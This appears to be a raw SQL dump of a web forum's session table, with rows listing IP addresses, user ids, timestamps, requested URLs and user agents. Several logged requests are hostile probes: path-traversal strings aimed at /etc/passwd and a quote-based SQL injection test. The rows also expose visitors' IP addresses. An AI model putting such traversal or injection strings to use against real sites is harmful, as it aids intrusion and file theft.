('9f7113c4328af575eff4890b0cc2fccf', 0, '172.68.34.93', 'dce73380cf0fd3aff82da93d9252bb04', 1468783636, '/tweet.php?do=post&id=2795&c=2795', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('71231e2a4660bb60021c49393e4f5fbc', 0, '167.57.18.45', '5caff6f3925a4fa7f8f611bd971e68af', 1468783821, '/showthread.php?p=3046', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.10', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('13c75f09d07ac83beedebcadaf0d6cdc', 0, '172.68.34.46', 'dce73380cf0fd3aff82da93d9252bb04', 1468797462, '/tweet.php?do=thread&id=2506', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('962d8da3f86540e5e0a97e6ea3290438', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1468819258, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('d55ca6fafb8675153b239d24d7fdd989', 386, '95.154.201.157', '6b47946c811523d78d8a1df3bd4ed656', 1468826385, '/member.php?u=386', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('b6de1483d7217a4aa10a3dad374dd7a9', 161, '172.68.29.181', '7b7d15bc9ebbf00e95fb18a8a25e3f33', 1468838343, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('cba976e6ec7503315222957d7372cc19', 386, '82.145.39.112', '5fef2757edc1a393981933e14a7ff006', 1468840547, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('154773d97e6bb4efbf7ac555538f3cdd', 0, '157.55.39.6', '23f3103f44bc3badcba53554e5e4cb6d', 1469631099, '/private.php?do=newpm&u=1', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('080b21e1099a7a7e27e7333c0fa63f68', 0, '2a02:2149:862c:', '83e6e1194d8300ad3ed2dc9237bb3c07', 1468843666, '/index.php', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('08b1e1a6f8a3698a4c98e334c57188df', 0, '31.24.221.3', '0d75c42f867c4819d3753ca4aa644c9e', 1472726977, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c8602c48c761cc948ae76ba2306064ef', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1468862108, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('581341c1e49cf0f79a5f74f7ba7f3dea', 0, '172.68.34.93', 'a938925ca9403f145c82d10ebc1ecbe1', 1470306995, '/archive/index.php/t-2331.html', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('350e3a10539fa1b2e5cf0b54006111d0', 0, '172.68.34.46', '37a60411c341250cf0113f4eba911963', 1470259425, '/archive/index.php/t-2329.html', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('c48ffa7ab66887663f51b86d2c08b672', 0, '172.68.29.140', '1e209b5b1eb3afb19bac4229db098917', 1468872018, '/register.php', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.10', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('5153fd298017c53ca4042f704ff10a0c', 0, '54.205.163.96', '36fabcec3af6a4bcfbd8a95315ba05f2', 1468872325, '/showthread.php?p=3045', 'RebelMouse/0.1 Mozilla/5.0 (compatible; http://rebelmouse.com) Gecko/20100101 Firefox/7.0.1', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('4479ae30367141b5a880d5ca8a8dcf3c', 0, '62.210.14.143', '2534d2dce60b02944832ab647873351f', 1468873469, '/member.php?u=388', 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:34.0) Gecko/20100101 Firefox/34.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('91a9f2ef6f526756af2e0d004f4bd373', 0, '151.237.177.26', '113ef7758c2b339318484f261e0cb30c', 1468873470, '/login.php?do=login&do=login', 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:34.0) Gecko/20100101 Firefox/34.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('1a6753cf1e002d672c09cb521d378078', 0, '172.68.10.198', 'd8e6a220bebf943c0f6743993a0c4361', 1468877097, '/register.php', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d3337983162dce9c6ddd90ca9013e271', 0, '68.180.229.44', 'b82943e61bcbcf9d48406b07c3c4bca2', 1473147432, '/forumdisplay.php?f=31', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c2dbf29c35fa9980e062273cb9be3b40', 0, '172.68.10.197', 'b3bc0109844edb3a27e40289d7a43ed3', 1468890664, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a8aa26439a2d742cd20ea75cbc74d349', 0, '78.129.153.58', '68cfbbdb9c4f055b40b5b74b2134b48b', 1468893011, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('bd91fe7b66eb138d50d753280bf4ae2f', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1468905196, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('2572c14a2a73c1ccf1cd8591b308c83c', 0, '172.68.11.244', '9c27d0409d6166de56af4548dbdfb982', 1468909439, '/showthread.php?p=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%2500', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a105d7facb5b0f148e78b7c96c3d2d55', 0, '80.251.136.126', 'e696c8cfbff637411d7814bdd9fd2e86', 1468910081, '/showthread.php?p=3012', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('02565bac2d6c5a25a342af69912dab9f', 161, '54.233.145.152', '7b7d15bc9ebbf00e95fb18a8a25e3f33', 1468934661, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('4acb761e830a6ddf5de548dc597895fc', 0, '172.68.11.239', '59f80e5c2c08c34e722c3eab5dc8db57', 1468939753, '/showthread.php?p=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%2500', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('302a157b5ef8c22a89ffd0215e59de45', 0, '99.239.42.64', 'd4b0cab1cd108793193af7d0f7599ada', 1468941554, '/register.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Saf', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('4915c463016be67693fbff0154c00378', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1468948121, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('b697adb8be3e120150c7dce1e9481c02', 0, '62.210.14.143', 'b7622c32c05b6f73afeb82f7297c663a', 1468948160, '/member.php?u=388', 'Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('4a41ae1e7282e06bdc47422208fd21dc', 0, '5.231.41.42', '65e5f55f3958569db06fbda5e36583d7', 1468948161, '/login.php?do=login&do=login', 'Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b239459c00875d8de0b5a599f379a81b', 0, '119.81.159.209', '8193d87f48516a2f5e3702f22e26ee3f', 1468956420, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f3e3e34c87a08a2731727be412d58d07', 0, '168.1.53.245', '51978e2f6ed12a9a4d89016ef9642887', 1468956436, '/index.php', 'Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.7.1', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('1a3c62f9c351358fef49bbe33709a54e', 0, '46.50.19.141', '757492b7276582cc715d05f041c9874f', 1474191300, '/showthread.php?p=2897', 'Mozilla/5.0 (Android 6.0.1; Mobile; rv:48.0) Gecko/48.0 Firefox/48.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c60cde89ee4998d6e6a1c9f249840523', 0, '172.68.10.202', '88a9a42645609fbe545b25d45dc8249b', 1468986017, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('29a4f69d076629d7ea2aa415f394eff7', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1468991184, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('b618984debc561fccc5910e8d1c37160', 0, '207.46.13.106', '5e207e311e22cdc3b2095126a922fa93', 1469012732, '/showthread.php?p=3046', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e3cab8d7b2296f635ac362e8e99d81b7', 0, '157.55.39.224', '23f3103f44bc3badcba53554e5e4cb6d', 1469000062, '/search.php', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('bb209246809c8d49ae28803731551923', 0, '157.55.39.139', '23f3103f44bc3badcba53554e5e4cb6d', 1469198070, '/search.php?do=getdaily', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f993f6a28b5084db084fb97408bd0c63', 0, '157.55.39.68', '23f3103f44bc3badcba53554e5e4cb6d', 1469002652, '/memberlist.php', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6e90e78374b5cfdc005096ab6e82e930', 0, '72.252.14.163', '699835a8e23f91d43abee7aada3881c1', 1469014068, '/showthread.php?t=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('088dcd83011ca6b671215c6bc29825a8', 0, '2.53.150.94', 'e2310f0fb40b41263ce03c7beb3b62a4', 1469018119, '/register.php', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f015ea35585b3a7c00cbfc7b21cc2cbb', 0, '212.252.140.167', 'fcbc85463b8ac3e7fca39b540d09f6d1', 1469023117, '/index.php', 'Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a1a867fc4bf2f51e81475ba46b27f22a', 0, '85.118.134.144', 'bfa62d7912debce56bea4f2c2a7f57aa', 1469025070, '/index.php?langid=2', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:34.0) Gecko/20100101 Firefox/34.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('8e7cc31f622a8af4ba86af4145a7bff2', 0, '197.48.96.78', 'c9690bfa5becc46f162a8fadfee8213a', 1469029259, '/register.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('3789af9e194ca8b09aff8f2f4d6e6d3a', 0, '188.207.115.85', '3a25bc008db5735c2ebece90c105e155', 1469031553, '/index.php?', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 6 Build/MOB30O) AppleWebKit/537.36 (KHTML, like Gecko) Chro', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c22864df4dfada86c3a54db41e43f838', 0, '172.68.10.237', 'e705e0141d15cd6cdd0b278429c112e3', 1469033413, '/faq.php', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('97d442f6e56c4dbe215898649efda5b1', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1469034298, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('ee08c8fd2df67c08756d7f381bf82dd6', 0, '37.52.247.64', 'edca5a68e21614a6d4689bc7da008323', 1469055583, '/index.php', 'Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('56e0be38a1acaaa9ae79897dd03864f8', 0, '2804:7f4:5189:b', '83aac0123abf22682aac1b66a759da04', 1469061491, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('853c12c882c1f0d2add03f0859813fce', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1469077367, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('92153d0d0ffafad2053f706fd4244923', 0, '66.249.65.140', '0ff4417ffc4aa97369fda8263e0a4dca', 1473856932, '/index.php', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('9bd45023cbf5860ce6be316bfb3ac65c', 0, '66.249.65.173', '0ff4417ffc4aa97369fda8263e0a4dca', 1473463494, '/archive/index.php/t-1856.html', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('c12907d1572b687ebaeda4706d109a5a', 161, '54.233.145.152', '7b7d15bc9ebbf00e95fb18a8a25e3f33', 1469096087, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('fab6149c0eab0c3d04d760ec336b3476', 0, '66.249.65.179', '0ff4417ffc4aa97369fda8263e0a4dca', 1473861562, '/index.php?langid=2', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('fa0de45538a3e559c93f6fb89186e8ce', 0, '66.249.65.179', '2b2ff7461e581eb89ef4dc9afe8de380', 1470179840, '/tags.php', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('1401b8c7eeca9c04d70014a2f6048f45', 0, '66.249.65.176', '0ff4417ffc4aa97369fda8263e0a4dca', 1473859873, '/index.php', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e6b4137c8f1f88defed07dea9a1eb138', 0, '66.249.65.136', '2b2ff7461e581eb89ef4dc9afe8de380', 1471887178, '/showthread.php?p=2012', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('71706dfb47ead6479ac180dc4702258c', 0, '66.249.65.136', '0ff4417ffc4aa97369fda8263e0a4dca', 1473476012, '/archive/index.php/t-1856.html', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('88a87f3d43095a14026ea0086307f168', 161, '172.68.29.181', '7b7d15bc9ebbf00e95fb18a8a25e3f33', 1469104235, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('691cb7eb9b825fc76347ef1275f49fb1', 0, '66.249.65.132', '0ff4417ffc4aa97369fda8263e0a4dca', 1473849352, '/login.php?do=lostpw', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('acbbedf632b1771fe5d145fc78b683a7', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1469120309, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('806c6ae76e2c5f4b3f3a5e013b531149', 0, '5.254.139.8', '03f963d81a0ab70332374e40c0b3f8af', 1469130188, '/memberlist.php', 'Mozilla/5.0 (Windows NT 5.1; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('be9e3fbdf38355dd6d8d623c419c1bd5', 0, '66.249.65.132', '2b2ff7461e581eb89ef4dc9afe8de380', 1471603288, '/converse.php?u=9&u2=277', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('9cefec0df8e80984ec2404fb36fafbe2', 0, '79.106.109.132', '3e9539b5145b9178f5ba3dc1e644f795', 1469143354, '/showthread.php?p=2843', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('38d4c7ddbdabd9f11962e674ac26a519', 0, '66.249.65.173', '2b2ff7461e581eb89ef4dc9afe8de380', 1470110489, '/index.php', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('0afe677ca653504eb0ce860058c5585e', 0, '82.26.149.19', '055703969f8b4bcb25d5b81941ff7401', 1470134390, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('4e876e712a04950ba42bcfb70d511e96', 0, '31.135.76.13', '5fdab0cb5289568734093f47431ea284', 1469186992, '/search.php?do=getnew', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/5', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('99a85f29581eca0d2f70d16435a0fa86', 0, '198.8.80.35', 'd762198163ffebe2277dccc7d873de08', 1474170497, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Saf', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f60fba943ed7533a1d3314653d698ff0', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1469191864, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('e3c493bf1cdf0288ca09d5aa3164539a', 0, '66.249.65.176', '2b2ff7461e581eb89ef4dc9afe8de380', 1470036392, '/archive/index.php/t-1856.html', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('41933618808792c1d7e06ca790363480', 161, '172.68.29.181', '7b7d15bc9ebbf00e95fb18a8a25e3f33', 1469196109, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('e15d09dd3cc870a4e61ed5bdae8cd8c0', 0, '199.59.150.181', '943ffc0fc3c44360d2911a2a7ed4b039', 1469197507, '/showthread.php?p=3045', 'Twitterbot/1.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('680c0cfb398a5f87651c462e3da0a008', 0, '40.77.167.71', 'c5490a5a8e1813ac25cf9e19091dcb85', 1469198075, '/memberlist.php', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('587e2aa175bbec62951d114855ccfe2c', 0, '157.55.39.151', '23f3103f44bc3badcba53554e5e4cb6d', 1469198081, '/search.php', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('7482a00fde05040d4703e6acc8b5ae36', 0, '207.46.13.187', '5e207e311e22cdc3b2095126a922fa93', 1469252575, '/member.php?u=387', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('4f7ad34e7952959c9232ed508f2f5382', 0, '172.68.11.240', 'df748209df4b3df4ba18657443678252', 1469204879, '/showthread.php?p=2697', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/53', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('bc67f0fd5af0d9d3706df5fcdf1e6129', 0, '185.65.132.118', 'deaf4a1829eb387e80f667560172e781', 1469211489, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/601.6.17 (KHTML, like Gecko) Version/9.1.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e182d08953a5d2465409ef702dd68a89', 0, '66.249.65.140', '2b2ff7461e581eb89ef4dc9afe8de380', 1473807470, '/showthread.php?p=2936', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('4cbadb3e5409aa9544afab7b051c96bc', 0, '176.116.137.60', '36e6c3e107c61770dc94fd6a7a9e5f03', 1469216478, '/showthread.php?p=2301\'A=0', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('9d32fc71555c04c9d58f2aae0085cf47', 0, '171.232.74.249', '0f1f6b49f730ff554a22e78926e06710', 1469221295, '/showthread.php?t=2464', 'Mozilla/5.0 (Linux; Android 4.4.2; IM-A870S Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('bc5eff60e32bdb763a2aa4c64bfb37fe', 0, '85.118.134.144', 'c245ac7246123de2a4b6de962c64a9fe', 1469229367, '/index.php?langid=2', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:35.0) Gecko/20100101 Firefox/35.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('9f6b81cada22c09fd907a9197fbb196f', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1469234720, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('ab7902aba8b5f7c08643b339087ee97c', 0, '90.231.157.235', '8c93bb52e8cb02e6ed0335448a6d288f', 1469238826, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.10', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('73c9c6a2bafb4e652bf499c9eca517e7', 0, '212.252.139.103', 'c07d046b405d347f5e56f68d5e994107', 1469250750, '/index.php', 'Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('72c5d630b78bcedafd81985f26d9db07', 0, '40.77.167.44', 'c5490a5a8e1813ac25cf9e19091dcb85', 1469252634, '/printthread.php?t=2342', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('639edd9d5cf6e8aa95adbd5599fe4b3b', 0, '91.1.131.35', 'bed967e69267c6ec96370db7bbd4217a', 1469261233, '/index.php', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('13ecd01258063c08c33816a5be517c90', 0, '62.107.157.196', 'a7d8c79db7544a41a34f2aa2896a88b0', 1469268152, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Saf', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('2513f4f67006e617f9278d05bb967df9', 0, '46.200.225.70', '89db717601a8118587b43fe3c87223bd', 1469275595, '/index.php', 'Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d089d1980c9609214d5a4d8fe89aca42', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1469277943, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('0b69ba95226ef940c18a094e3c521a04', 0, '119.243.162.172', 'fdd516d57cf6d408663bfc8d16865fba', 1469285643, '/memberlist.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c96cb0ae0eafdfa4b0b643b18d14a345', 0, '212.252.139.103', '25aa452d341201fa28c1f78600c2f482', 1469289172, '/index.php', 'Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.3', 0, 0, 0, 0, 0, 0, 2, 0, 0),
